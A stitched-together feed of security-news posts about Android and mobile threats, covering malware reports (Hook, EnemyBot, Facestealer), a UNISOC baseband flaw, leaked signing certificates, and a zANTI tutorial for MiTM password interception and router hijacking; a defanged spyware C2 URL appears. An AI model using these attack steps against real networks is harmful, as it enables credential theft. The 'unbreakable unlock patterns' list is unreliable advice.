The Android App Pin feature is where the vulnerability may be accessed once it has already been exploited.Android app pinning was first referred to as’screen pinning’ when it was first introduced with Android 5.0 Lollipop (API level 21) on November 12, 2014. On Android smartphones, this powerful security feature improves the user’s ability to regulate their privacy and protect their data.

Users are given the ability to restrict their mobile device to a single program via the use of a feature known as “app pinning,” which effectively restricts their access to other apps and sensitive data. This capability proved to be quite useful in situations where keeping a highly concentrated work environment, dealing with public terminals, or sharing a device were all necessary requirements. When this is done, it stops unauthorized users from accessing personal data, programs, and settings, which contributes to an overall more secure digital experience.

The following procedures are often included when implementing app pinning as a method of application management:

Users may enable this feature by going to the Settings menu on their smartphone and selecting the Security and Privacy menu followed by the More Security Settings menu and then selecting the App Pinning option. After it has been enabled, users will be able to choose whatever app they want to pin.

Launching the chosen application is the first step in the pinning process, which allows users to enter pinned mode. This operation will permanently lock the device within the user interface of the chosen app.

When using the pinned mode, you won’t be able to interact with any other applications since they will be momentarily hidden from view. If you try to move to another app, access notifications, or perform any other function while the pinned app is open, the device will remind you that you are in the wrong app and keep you there.

Exiting Pinned Mode Users often need to give an extra layer of authentication in order to quit this mode. This may take the form of inputting a pre-set PIN, pattern, or password, or it can be accomplished via the use of biometric recognition (such as fingerprints or face recognition). Because of this additional degree of security, only users who are permitted to do so are able to exit the pinned app environment.

Pinning an Android app has many advantages, including the following:

Pinned mode protects users’ privacy and security by preventing unwanted access to private information, data, and programs that are deemed particularly sensitive.

Public Terminals: App pinning is important in scenarios like kiosks or shared devices since it confines users to a single program, hence decreasing the danger of illegal access and data exposure. This may be accomplished by pinning the application to the home screen of the device.

Focus and Productivity: Users may establish focused work environments by restricting the capabilities of their device to a single application that is task-oriented. This can increase their level of productivity.

Pinning an app to the home screen allows parents to limit their children’s access to just those games and programs that are suitable for their age or those that are instructive.

In a nutshell, Android app pinning, which was formerly referred to as “screen pinning,” was launched with Android 5.0 Lollipop and offers comprehensive control over the functionality and access of the device. It provides increased security, privacy, and focused interaction with digital information by designating a certain app as the one that may be used and needing authentication in order to leave that mode.

There is a logic mistake in the code that makes it possible for a general purpose NFC reader to read the whole card number and expiration data even while the screen on the device is locked. This problem can be found in the HostEmulationManager.java file, which is located in the onHostEmulationData section. This might result in the leaking of local information without the need of any extra execution rights. Exploitation may occur without the participation of the user.

According to Google’s calculations, the severity of this vulnerability is rather high.Along with his discoveries, the hacker was kind enough to submit a proof-of-concept attack, which brought attention to the seriousness of this high-severity vulnerability.

The post Exploiting Android App Pin feature to steal money from mobile wallets apps appeared first on Information Security Newspaper | Hacking News.

So without wasting too much time we will show you top 10 mobile patterns that are hard to break. Before we jump let us understand that pattern is combination of 9 dots in most of the cases. Below figure will help you understand the numbers used behind these patterns.

Now we understood the concept behind the pattern. The way it works is that whenever we draw any pattern its converted to the numbers for the mobile phone to unlock it. Mobile takes these numbers as password and unlocks your mobile phone. Let’s see which are the 10 most impossible mobile patterns to break.

1. FISH (2-5-8-4-6-9-3-1)

The is called fish pattern and the number written in brackets are the sequence of the patterns to be followed to create a pattern that resembles fish. Its starting with dot number 2 and then draw a line to dot 5 and then from dot 5 to dot and so on as shown below.

2. Love Angle (2-5-9-1-4-8-6-3-7)

Its is lovely angle pattern use it if you love someone but don’t want to tell her or him.

3. Ribbon (5-7-3-6-4-1-9)

4. Bird man mobile pattern (2-5-7-3-6-4-1-9)

5. Robo Head (2-5-4-6-3-9-8-7-2)

6. MKBHD (4-8-6-9-3-5-1-7)

7. Illusion (2-1-3-5-4-6-8-7-9)

8. Impossible (8-6-5-4-2-1-3-7-9)

9. MAZE (1-2-5-4-6-3-9-8-7)

10. Time Machine (8-6-5-4-2-3-1-9-7)

The only important is that whenever you use any of these just note down the number sequence. You can refer your number sequence if in case you get in your own trap.

The post 10 impossible mobile patterns to break appeared first on Information Security Newspaper | Hacking News.

You will be notified of this
If you have an iPhone and you are being tracked by an AirTag, your phone may send you a notification that says “AirTag discovered moving with you.” This will occur if all of the following conditions are met:

The AirTag has been detached from its rightful owner.
iPhone of yours is awake.
When you move the AirTag, it will make a sound.
This may also occur with other accessories that are compatible with Find My Network, such as AirPods, AirPods Pro, or AirPods Max. When you move any of these goods when they are not being handled by their owners, each of them will make a sound.

Verify that the Tracking Notifications feature is turned on.
In the event that you do not get an alert, it is possible that you will need to complete the following procedures in order to guarantee that your tracking alerts are activated:

Go to the Settings menu, and then pick Privacy.
To activate Location Services, choose Location Services from the menu.
Go to the System Services menu.
Put your iPhone in find mode and activate the Notable Places feature.
Return to the Settings menu, and then choose Bluetooth.
Bluetooth must be on.
Last but not least, open the Locate My app and choose yourself.
Activate the Tracking Alerts on your browser.

Try out the app called “Find My.”
When AirTags get separated from their owners, they will produce a sound whenever they are moved in order to assist others in locating them. After confirming that Step 2 has finished, you may open the Locate My app and check to see if the AirTag is located if you think you may have heard an AirTag or another sound that you are unable to identify and suspect it may be an AirTag.

Make AirTag produce a sound.
If you have been notified that an AirTag was traveling with you and are checking the Find My app, you have the option to play a sound on the device in order to locate it more quickly. You can monitor other people’s AirTags by using the Find My app, which you may access by touching on the alert, selecting continue, and then tapping Locate Nearby.

Check all the details about AirTag 
When you have the AirTag in your line of sight, you may access the information it contains on your iPhone or any other smartphone that supports NFC. You will need to bring the top of your iPhone close to the white side of the AirTag that you have located and wait for it to identify it. A notice displays beside a webpage that contains the owner’s last four digits of their phone number in addition to the AirTag’s serial number. If this is a lost AirTag, the owner may have included their contact information so that the person who found it may get in touch with them.

Inactivate the AirTag.
If the owner of an AirTag disables it, they will no longer be able to see its current position or get updates about it. Just removing the battery is all that is required to deactivate the AirTag. You may do this by first opening the AirTag by depressing the button on top and then removing the battery by turning the lid counterclockwise.

You will be able to determine the position of another person’s iPhone so long as your AirTag is in close proximity to that device. And with Apple’s recent release of an official app for monitoring AirTags on Android devices, you don’t even need an iDevice to accomplish that anymore! Yet, there is one very significant exception to this rule.

With Apple Music, the Beats app, and an application for transitioning to iOS, Tracker Detect is one of the few Apple applications that can be downloaded and used on Android devices. If you wish to zero in on a specific rogue AirTag, you can use the app to play a sound on it, and you can also use the app to monitor neighboring rogue AirTags using it. From that point on, you have the option of scanning the AirTag using an NFC reader or turning it off by removing its battery. The functionality is really fundamental, despite the fact that it is rather cool looking. Since it does not have an auto-scan feature, you will not get alerts about nearby missing AirTags as you would on an iPhone. This means that in order to look for a tag, you will need to manually launch the application first. One may argue that this renders the Tracker Detect app rather worthless since a large number of individuals in the reviews part of the app believe that it ought to be able to auto-scan. Spending your day manually searching your immediate environment for AirTags every five minutes is not the most effective use of your time.

It’s not even like there are roadblocks in the way of making that happen on Android phones; all you need is Bluetooth Low Energy (BLE). And enabling auto-scanning for AirTags on non-Apple devices and having those devices participate to Apple’s Find My network would also considerably increase the success of finding AirTags in general. Download the application from the Google Play Store right now if you have an Android device and want to be able to scan AirTags with it.

The post I think someone is spying me using AirTag, what should I do? appeared first on Information Security Newspaper | Hacking News.

It is true that this iteration of the malware includes quite a few changes compared to its predecessor; nonetheless, it is quite evident that this is only an upgrade and enhancement of the earlier versions of Ermac. It is likely that the criminals, adopting a tactic that is commonly used in marketing strategies, made the decision to launch a new brand with their most recent product rather than keeping the existing one, which was associated primarily with activities pertaining to cryptowallets and the exfiltration of personally identifiable information (PII). This is a very plausible explanation for the events that took place. Following a successful installation and configuration of the malware, the bot will attempt to communicate with its C2 server using standard HTTP traffic.

In its connection with the C2 Server, Hook employs the same same encryption methods that Ermac makes use of. The information is first encoded in Base64 before being encrypted using AES-256-CBC with a key that has been hardcoded. In addition to the HTTP traffic that was used in the earlier Ermac versions, this new form of the malware now utilizes WebSocket communication. This is a change that was made as part of the modification process. The implementation is dependent on Socket.IO, which is an implementation over HTTP and WebSocket that allows real-time communication in both directions between web clients and servers. This communication may take place in real time. This is the channel over which the bot registers itself with its server, transmits a list of programs that are currently installed on the device, and downloads a list of targets.

The most significant improvement in terms of capabilities is provided by a component known as VNC, which stands for virtual network computing. Virtual Network Computing, sometimes known as VNC, is a specialized version of a program that allows users to share their screens and exercise remote control over their devices. However, threat actors have been using this phrase to denote any kind of functionality that may be found in a Remote Access Tool (RAT). In the instance of Hook, this is accomplished by interacting with the many UI components that are necessary to carry out a broad variety of tasks via the use of the Accessibility Services.

Hook is now able to join the ranks of malware families that are capable of performing full DTO and completing a full fraud chain without the need of any extra channels, beginning with the exfiltration of personally identifiable information and continuing all the way through the transaction. The fact that fraud scoring systems have a far more difficult time identifying this sort of activity is the primary selling point for Android bankers.

The malicious software is able to simulate a broad variety of user actions on the device, including as clicking, filling in text areas, and executing gestures. This is the list of new commands that are associated with the RAT features that have been reported.

Similar to those of earlier iterations of Ermac, the target list is quite comprehensive and comprises establishments from all over the globe.

The actor makes a guarantee to his purchasers of more than a hundred targets, the vast majority of them are the same objectives that were available in earlier editions of Ermac. On the other hand, this updated version includes hundreds of additional targets, some of which are social applications and others of which are financial applications. New targets include those who have been banned from entering the country from South America, Asia, Africa, and the Middle East.

You may obtain a quick review of the areas that Hook focuses on the most by looking at the following:

The recent events surrounding Hook, the most recent member of the Ermac family of viruses, are pointing in a very specific path. Hook is now a member of the very hazardous class of malware that is able to carry out a whole attack chain, beginning with infection and ending with fraudulent transaction. In addition to this, it comes equipped with new features that are typical of spyware. These features make it possible for criminals to monitor and spy on the device, giving them complete visibility not only into the victim’s financial information, but also into their messaging, geolocation, and control over the files that are stored on the phone. As was previously mentioned, the Ermac malware family was one of the most widely distributed families in 2022. Now, with the release of its most recent development, Hook, ThreatFabric anticipates that Ermac will make the final quality leap and join Hydra and ExobotCompact/Octo on the podium of Android Bankers that are available for rent.

The post This new android malware allows to hack & spy on any Android phone appeared first on Information Security Newspaper | Hacking News.

The application signing certificate that was used to sign the “android” program that was stored on the system image is known as a platform certificate. The “android” program runs with a highly privileged user id called android.uid.system and retains system rights, including permissions to access user data. This is because it has the ability to hold the android.uid.system user id.

If applications, even malicious ones, are signed with the same platform certificate and assigned the highly privileged ‘android.uid.system’ user id, then these applications will also gain system-level access to the Android device. This access can be gained by signing the application with the platform certificate.

An abusive usage of platform keys was detected by Lukasz Siewierski, a Reverse Engineer in Google’s Android Security team. This information was published in a report that is currently available to the public on the Android Partner Vulnerability Initiative (AVPI) issue tracker.

Siewierski discovered many malware copies that were signed using these 10 Android platform certificates. He supplied the SHA256 hashes for each of the samples as well as the certificates that were digitally signed.

There is no evidence available at this time on the circumstances that led to these certificates being misused to sign malware. It is unknown if one or more threat actors stole the certificates, or whether an authorized employee signed the APKs using the vendor keys.

In addition, there is no information on the locations of these malware samples, such as whether they were discovered on the Google Play Store, if they were spread via third-party shops, or whether they were used in malicious activities.

Google notified all impacted vendors of the misuse and gave them advice to avoid such problems by rotating their platform certificates, looking into the breach to determine how it occurred, and limiting the amount of applications signed with their Android platform certs.

There is no evidence to suggest that this malicious code was ever distributed via the Google Play Store. Always and without fail, our standard piece of advice to users is to check that they are on the most recent version of Android.

Using APKMirror to search for apps that have been signed with these certificates that could have been compromised is a simple way to get an overview of all Android apps that have been signed with these certificates.

The post Bad news! The platform certificates of many phone manufactures have been hacked. These are used to sign trusted apps on Android phones. Now these certificates are being used to certify malicious Android applications appeared first on Information Security Newspaper | Hacking News.

The vulnerability is related to access tokens to the Amazon Web Services cloud service. Apparently, 77% of the analyzed apps contained the credentials in their code, in view of possible attackers who could use them to access private services.

One of the vulnerabilities was exploited to extract data from thousands of clients of a bank

As the researchers explain, AWS access credentials are normally used to connect the resources necessary for the application to fulfill its mission, including files from configuration or authentication data of other services.

The problem is that the more than 1,800 apps analyzed had the credentials embedded directly in the code. And what is even worse: more than half of the applications used the same access credentials used by apps from other companies and developers.

To make matters worse, 47% of the identified applications contained valid AWS tokens that granted full access to all private files and Amazon Simple Storage Service (S3) buckets in the cloud. This included infrastructure files and data backups, among others.

After analyzing the vulnerability, the researchers detailed the case of a company that offers a communications platform for their clients as well as a mobile development kit, and had the access keys embedded in the SDK code. For that reason, the data of all its clients was exposed, including corporate data and financial records belonging to more than 15,000 medium and large companies.

That’s not all. In the case of five applications belonging to banking entities, made for the iOS operating system, it was possible to obtain the biometric access data of more than 300,000 clients. To date, the companies in charge of developing the affected apps have already been notified by the team of researchers. Unfortunately, Symantec has not shared a list of the applications affected by the vulnerability.

The post Threat actors could access user data stored in the Amazon cloud due to vulnerabilities in nearly 2,000 iOS and Android apps appeared first on Information Security Newspaper | Hacking News.

Using this tool, a hacker can crack passwords on Android and also change HTTP requests and responses, triggering wireless network compromise scenarios via an Android phone.

As usual, we remind you that this tutorial was prepared for informational purposes only and does not represent a call to action, so IICS is not responsible for the misuse that may be given to the information contained herein.

Before we continue, let’s take a look at all the actions we can take using ZANTI:

• Hack HTTP sessions using Man-in-The-Middle (MiTM) attacks
• Download capture
• Modification of HTTP requests and responses through MiTM attacks
• Router hijacking
• Password interception
• Scanning devices for Shellshock and SSL Poodle vulnerabilities
• Detailed nmap scanning

Installing ZANTI

Follow the steps listed by the experts in the Cyber Security 360 course to install ZANTI correctly:

• Go to the official website from https://www.zimperium.com/zanti-mobile-penetration-testing
• Enter an email address
• The download link will be available shortly
• Download the APK
• Select the option Install from unknown sources if necessary
• Install the APK
• Open the app, grant the required permissions and connect to a WiFi network

Let’s take a closer look at the features of the tool.

Hack HTTP sessions with MiTM

You can redirect all HTTP traffic to a specific server or site by default, as soon as the “HTTP Redirect” feature is enabled. You can also redirect it to a specific website by clicking on the settings icon, and then you will find a place to enter the URL.

Download capture

This feature allows you to connect to the host’s downloads folder and get a copy of all its contents. For example, if you select “.pdf” from the menu and click “Upload File”, all PDF files will be downloaded to your phone.

This tactic can be especially useful when it comes to social engineering, mention the experts of the Cyber Security 360 course.

Modification of HTTP requests and responses through MiTM attacks

Using zPacketEditor you can change http requests and responses on your network. It is an interactive mode that allows you to edit and submit each request and response. However, this is complicated and may not work on all phones.

Hijack routers

Router pwn is a web application for exploiting router vulnerabilities. This is a set of local and remote exploits ready to run.

For use, click on “Routerpwn.com”, then select your router provider; you can check for other vulnerabilities, so if you wish you can find out more about these flaws.

Password interception

This is the main feature of ZANTI and allows the capture of passwords in networks, mention the experts of the Cyber Security 360 course. For this, select the target device and click the MITM button; you can find the results in the saved passwords section.

Scanning devices for Shellshock and SSL Poodle vulnerabilities

First, select the device; click on “Shellshock/SSL Poodle” and you can scan the target device. Wait for a while and then get the result. If the device is vulnerable, you can use it.

nmap scanning

This feature gives you all the important sensitive information about the target and network, open ports, IP addresses, operating systems, etc. It can be very useful to find exploits and hacks related to our goal, mention the experts of the Cyber Security 360 course.

These have been some basic concepts for the use of the ZANTI tool, which can prove very useful for hacking Android devices over wireless networks.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and to learn more about the Cyber Security 360 course.

The post <strong>Tutorial for pentesting Android apps using the free ZANTI toolkit</strong> appeared first on Information Security Newspaper | Hacking News.

While UNISOC is a major chip producer, its technology has been little analyzed by mobile security specialists, so it is difficult to know what the security risks are present in devices with these chips and there are not even references to any vulnerability detected in their firmware.

A recent research effort was led by Check Point Research, and focuses on the modem of smartphones with UNISOC chips could be a very attractive attack target for cybercriminals, as this component can be accessed remotely and relatively easily, with the potential to deploy denial of service (DoS) attacks and block the communications of the affected devices.

Basic attack concepts

The Long-Term Evolution (LTE) network is made up of a dozen protocols and components, and you need to understand it to understand how the UNISOC modem works. The 3GPP Group introduced the Evolved Packet System (EPS), an LTE technology architecture consisting of three key interconnected components:

• User equipment (UE)
• Evolved UMTS terrestrial radio access network (E-UTRAN)
• Evolved Packet Core (EPC)

E-UTRAN has only one stack, the eNodeB station, which controls radio communications between the EU and the EPC. A UE can be connected to one eNodeB at a time.

The EPC component consists of four stacks, one of which is the Mobility Management Entity (MME). The MME controls the high-level operations of mobile devices on the LTE network. This component sends signaling messages related to security control, management of tracking areas, and mobility maintenance.

Check Point Research’s tests, conducted by a smartphone with a UNISOC modem, focus on communications between MME and UE stacks, which occur via EPS session management (ESM) and mobility management (EMM) protocols. The following screenshot shows the protocol stack of the modem. The no-access stratum (NAS) level hosts EPS and EMM signaling messages.

The NAS protocol operates with high-level structures, which would allow threat actors to create specially crafted EMM packets and send them to a vulnerable device, whose modem will analyze it and create internal objects based on the information received.

A bug in the scanning code would allow hackers to lock the modem and even perform remote code execution (RCE) attacks.

Security flaws in NAS handlers

Most NAS message analyzers have three arguments: an output buffer, which is an object of the appropriate message structure, the NAS message data blob for decoding, and the current offset in the message blob.

The unified function format allows you to easily implement the harness to fuzz the NAS analysis functions. Check Point experts used the classic combination of AFL and QEMU to fuzz the modem binary on a PC, patching the modem binary to redirect malloc calls to the libc equivalent. The fuzzer swapped the NAS message data and passed it as an input buffer to the analysis function.

One of the optional fields ATTACH_ACCEPT is mobile identity. The modem firmware implements an unpacking function such as liblte_mme_unpack_mobile_id_ie of srsRAN to extract the mobile identity from the NAS message. The identity data block begins with the length of the identity; if the device is represented by an International Mobile Subscriber Identity (IMSI), the 2-byte length of message data is copied to the output buffer as the IMSI number.

The check is bypassed to ensure that the provided length value is greater than one. Therefore, if the value of the length field is zero, 0-2 = 0xFFFFFFFE bytes of the NAS message are copied to the heap memory, leading to a DoS condition.

In the following screenshot, you can see the message ATTACH_ACCEPT, which causes the overflow.

Conclusions

The highlighted 0x23 value indicates that the following data is the identity block of the message, where the first 0x01 is the length and the second 0x01 is the IMSI type.

UNISOC is aware of this condition, and has already been assigned the identification key CVE-2022-20210. While the hacking variants described by Check Point are not easy to exploit and require great resources and planning, the possibility of exploitation is real and should not be dismissed.

Errors will be properly addressed, protecting millions of smart device users. Google is also aware of the report and will issue some additional protections for the Android system. 

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

The post Millions of Android smartphones exposed to remote hacking due to vulnerability in UNISOC baseband chips appeared first on Information Security Newspaper | Hacking News.

The malware, identified as EnemyBot, targets services such as VMware Workspace ONE, Adobe ColdFusion, and WordPress, as well as some IoT and Android devices. EnemyBot has been deployed at an astonishing speed thanks to the exploitation of known security flaws.

This new malware was developed from the source code used by other botnets, including Mirai, Qbot, and Zbot. Hackers use EnemyBot to target Linux systems and IoT devices.  

A closer look

According to the report, malware is divided into four main sections:

• A Python script ‘cc7.py’, used to download all dependencies and compile malware on different operating system architectures (x86, ARM, macOS, OpenBSD, PowerPC, MIPS). After compilation, a batch file “update.sh” is created for malware propagation
• The main source code, which includes all the functions of EnemyBot, and incorporates the source code of the other botnets
• A hide.c segment that is manually compiled and executed to encode/decode malware strings
• A command and control (C&C) component to receive vital actions and payloads from hackers

The malware also features a feature for scanning vulnerable IP addresses and an “adb_infect” feature, which abuses the Android Debug Bridge feature for mobile device compromise.

Among the failures exploited in this campaign are:

• CVE-2021-44228 and CVE-2021-45046, also known as Log4Shell
• CVE-2022-1388, a vulnerability in F5 BIG IP devices
• CVE-2022-25075, TOTOLink A3000RU routers fail
• CVE-2021-35064, flaw at Kramer VIAWare

While researchers believe this campaign is in its early stages, the constant updating that malware receives and the possibility of exploiting multiple vulnerabilities would allow hackers to deploy massive campaigns soon.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

The post EnemyBot: New IoT malware exploits one-day vulnerabilities to hack thousands of devices appeared first on Information Security Newspaper | Hacking News.

In total, the analysis revealed the detection of 200 malicious applications that hide code from dangerous malware variants, capable of putting users of the affected devices in serious trouble.

Simple tools, complex issues

One of the main threats identified is Facestealer, a spyware variant capable of stealing Facebook access credentials, allowing subsequent phishing campaigns, social engineering, and invasive advertising. Facestealer is constantly updated and there are multiple versions, making it easy for them to get into the Play Store.

Daily Fitness OL is described as a fitness tool, offering exercise routines and demonstration videos. Although there doesn’t seem to be anything wrong with this app, an in-depth analysis shows that the app’s code hides a load of The Facestealer spyware.

When a user opens this app, a request is sent to hxxps://sufen168.space/config to download their encrypted settings. This setting sends the user a message requesting to log in to Facebook, after which the app launches a WebView to load a malicious URL. Subsequently, a snippet of JavaScript code is injected into the loaded website, allowing the theft of the user’s credentials.

Once the user logs into their Facebook account, the app collects the cookies and the spyware encrypts the collected information to send it to a remote server.

Other malicious apps, such as Enjoy Photo Editor or Panorama Camera, also hide Facestealer loads and have a very similar attack process, although they may vary in some stages or methods.

Risk for crypto investors

Experts have also identified more than 40 fraudulent cryptocurrency apps disguised as legitimate tools, even taking their image or using similar names. The developers of these tools seek to get affected users to buy supposed Premium versions at high costs with fake ads.

Tools like “Cryptomining Farm Your Own Coin” do not demonstrate invasive behaviors even in test environments, so they effectively evade security mechanisms in the Play Store. However, when trying to connect a Bitcoin wallet to this application, a message appears asking the user to enter their private keys, a clear red flag alerting that something’s wrong.

A sample of the code was developed using Kodular, a free online suite for mobile app development. Trend Micro notes that most fake cryptocurrency apps use the same framework.

The analyzed app only loads a website and does not even have capabilities to simulate mining processes or cryptocurrency transactions.

The uploaded website mentions users who can participate in a cloud mining project in order to lure them to the true start of the attack. Next, threat actors ask users to link a digital wallet to this website, in an attempt to collect private keys, which are further processed with no encryption at all.

Although the malicious applications were reported to Google and have already been removed from the official store, the researchers believe that the company must considerably improve security measures in the Play Store, as many developers of malicious applications continue to find methods to evade the security of the app repository, putting millions of users at risk.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post More than 200 apps on Play Store with millions of downloads are stealing users’ passwords and sensitive information appeared first on Information Security Newspaper | Hacking News.

GO Keyboard – Emojis & Themes is described as an app for keyboard customization, with more than 1,000 themes, emojis and fonts for the user to add to their devices. In its Google Play Store profile, it can be seen that the app has more than 100 million downloads and even assure its users that their confidential information will never be collected, something that we could already doubt.

Since the app is still on the Play Store, any Android user might assume that this is a reliable tool. Unfortunately, sometimes unscrupulous developers manage to evade the security mechanisms of the application repository, either by hiding dangerous variants or, as in this case, by requesting highly invasive permissions on the affected systems.

According to Christl, the GO Keyboard code contains a total of 27 trackers, which allow collection data about certain characteristics of a smartphone or user activities, mainly for marketing purposes. Among the trackers used by GO Keyboard are Amazon Advertisement, Facebook Ads, Facebook Analytics and Google AdMob.

The app also contains code signed by myTarget, an advertising platform provided by Mail.Ru Group and including all major Russian-speaking social networks.

As if that were not enough, at the time of its installation GO Keyboard requests 27 permissions on the system, including access to the precise location of the device, execution of the service in the foreground, access to network connections, full access to the network, use of the device’s camera, audio recording, access, modification and deletion of the contents of the SD card, and prevent the device from sleeping. Specialists at Exodus, which detects whether mobile apps contain third-party tracking code, find it worrisome that a simple tool to customize a smartphone’s keyboard requests so many permissions on the affected systems.

These findings have already been shared with Google, although the app is still available on the Play Store and its developers don’t seem to have made any changes. In addition, there are hundreds of applications that maintain similar practices, accumulating millions of downloads and exposing users to all kinds of risks. As usual, the recommendation for Android users is to uninstall this app from their devices.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post GO Keyboard, an app with over 100 million downloads, has full access to the phone and contains tracking code from 20 companies, including Google, Facebook, Amazon and the Russian government appeared first on Information Security Newspaper | Hacking News.

The maximum bounty for successful reports through Google’s program is $1 million USD, applicable for remote code execution issues on the Titan M chip, used in Pixel devices. Via Twitter, Google detailed: “Vulnerabilities in Android 13 Beta discovered between 04/26/22 and 05/26/22 are eligible for a reward payment of up to $1.5 million USD for a full chain of remote code execution exploits on Titan M.”

On the other hand, reports of data mining errors in Titan M could be rewarded with up to $750,000 USD during this special period, as opposed to the $500,000 usually paid to researchers.

Finally, code execution errors in Android components such as secure element, reliable execution environment and kernel could receive up to $375,000 USD. Just a month ago, Google announced that the rewards offered by eligible vulnerability reports from Google Nest and Fitbit would be doubled, with the tech giant still looking to incentivize ongoing collaboration with independent security specialists.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post You can earn 1.5 million dollar by finding vulnerabilities in Android 13 Beta appeared first on Information Security Newspaper | Hacking News.